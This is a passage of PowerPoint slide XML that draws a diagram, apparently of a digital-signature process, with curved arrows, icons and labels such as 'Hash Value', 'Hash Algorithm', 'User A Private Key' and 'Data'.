                  <a:pt x="12643" y="18868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13021" y="19101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13417" y="19312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13812" y="19475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14172" y="19615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14964" y="19802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15323" y="19849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15683" y="19872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16043" y="19849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16420" y="19779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16780" y="19709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17122" y="19568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17463" y="19405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17769" y="19171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18093" y="18938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18399" y="18634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18704" y="18284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18992" y="17887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19262" y="17467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19514" y="16976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19784" y="16463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20017" y="15856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20215" y="15248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20431" y="14525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20647" y="13777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20791" y="13007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20953" y="12166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21114" y="11255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21204" y="10275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21312" y="9247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21420" y="8126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21474" y="6982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21528" y="5768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21546" y="4483"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="906" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2061334" y="5994399"/>
            <a:ext cx="1310417" cy="1645902"/>
            <a:chOff x="22732" y="0"/>
            <a:chExt cx="1310416" cy="1645900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="904" name="Policy_Writing01" descr="Policy_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="233119" y="0"/>
              <a:ext cx="945613" cy="1257590"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="905" name="Hash Value"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="22732" y="1185652"/>
              <a:ext cx="1310417"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2200">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Hash Value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="909" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1429173" y="4477173"/>
            <a:ext cx="2677520" cy="1156096"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2677519" cy="1156095"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="907" name="Hash…"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1567103" y="365647"/>
              <a:ext cx="1110417" cy="79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p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Hash </a:t>
              </a:r>
              <a:endParaRPr sz="2200"/>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr sz="2200"/>
                <a:t>Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="908" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1499165" cy="1151467"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="6407005">
            <a:off x="4268329" y="5478497"/>
            <a:ext cx="2485814" cy="11288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07" y="13442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20448" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20355" y="12343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20276" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20077" y="11314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19865" y="10605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19640" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19137" y="8690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="8087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18581" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18302" y="6916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17640" y="5781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17322" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="4753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="4292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16223" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15826" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15415" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14170" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13733" y="1561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13270" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12343" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10158" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8237" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6953" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721" y="674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5125" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556" y="1241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973" y="1596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="4646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424" y="5320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411" y="5462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834" y="5001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1258" y="4575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159" y="3760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384" y="3618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072" y="3086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576" y="2837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="2518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4569" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5072" y="2128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589" y="1986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6661" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="1667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8264" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9257" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9734" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10237" y="2057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="2447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11641" y="2625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12979" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="4540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634" y="4966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="5427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="5817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15746" y="6278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16104" y="6810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16435" y="7306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="7838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17084" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17667" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="10747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="11421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="12059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19071" y="13442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19243" y="14116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="14826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19031" y="14967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="15145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21176" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20607" y="13442"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="913" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3831448" y="6685280"/>
            <a:ext cx="2065868" cy="2019527"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2065866" cy="2019525"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="911" name="Key_Private01" descr="Key_Private01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1110826" y="0"/>
              <a:ext cx="955041" cy="1882987"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="912" name="User A Private  Key"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="997937"/>
              <a:ext cx="1171787" cy="10215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p>
              <a:pPr defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>User A Private </a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="914" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19537180">
            <a:off x="4750364" y="2546773"/>
            <a:ext cx="2406792" cy="17046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99" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1225" y="254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905" y="470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2232" y="587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2572" y="724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926" y="880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3267" y="1037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988" y="1389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4723" y="1780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5444" y="2230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="2680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6969" y="3209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7717" y="3737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8493" y="4304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9255" y="4891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10004" y="5498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752" y="6124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11501" y="6770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12236" y="7415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12944" y="8100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14332" y="9430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15611" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16224" y="11485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16795" y="12170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17340" y="12815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17857" y="13461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18333" y="14087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18769" y="14713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19136" y="15300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19490" y="15867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19654" y="16122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19790" y="16415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20035" y="16924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20048" y="16865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20103" y="16748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20307" y="16474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20579" y="16024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21096" y="18822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21450" y="20759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21450" y="21483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21069" y="21091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19912" y="19957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18197" y="18254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18633" y="18078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18878" y="18000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19000" y="17941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18960" y="17863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18919" y="17746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18783" y="17491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18606" y="17178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18374" y="16807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18088" y="16396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17775" y="15907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17027" y="14830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16591" y="14263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16129" y="13637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15611" y="12991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15081" y="12307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14509" y="11622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13896" y="10917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12617" y="9430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11936" y="8726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11229" y="7983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10494" y="7259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9772" y="6554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8997" y="5830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8234" y="5126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7445" y="4480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6628" y="3815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6234" y="3502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825" y="3209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022" y="2602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4192" y="2074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3770" y="1820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3335" y="1546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2926" y="1330"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2504" y="1096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096" y="880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1660" y="685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1252" y="470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="422" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="919" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7493564" y="2609991"/>
            <a:ext cx="1108570" cy="1792676"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1108568" cy="1792675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="915" name="Document_Writing01" descr="Document_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1108569" cy="1792676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="918" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="82488" y="762474"/>
              <a:ext cx="895307" cy="472949"/>
              <a:chOff x="0" y="18203"/>
              <a:chExt cx="895305" cy="472947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="916" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="28329"/>
                <a:ext cx="895306" cy="452697"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74900"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="917" name="Data"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="112331" y="18203"/>
                <a:ext cx="670643"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marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="922" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9821727" y="5231270"/>
            <a:ext cx="1310417" cy="1573003"/>
            <a:chOff x="22732" y="0"/>
            <a:chExt cx="1310416" cy="1573001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="920" name="Policy_Writing01" descr="Policy_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="267577" y="0"/>
              <a:ext cx="872361" cy="1192836"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="921" name="Hash Value"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="22731" y="1112753"/>
              <a:ext cx="1310418"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2200">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
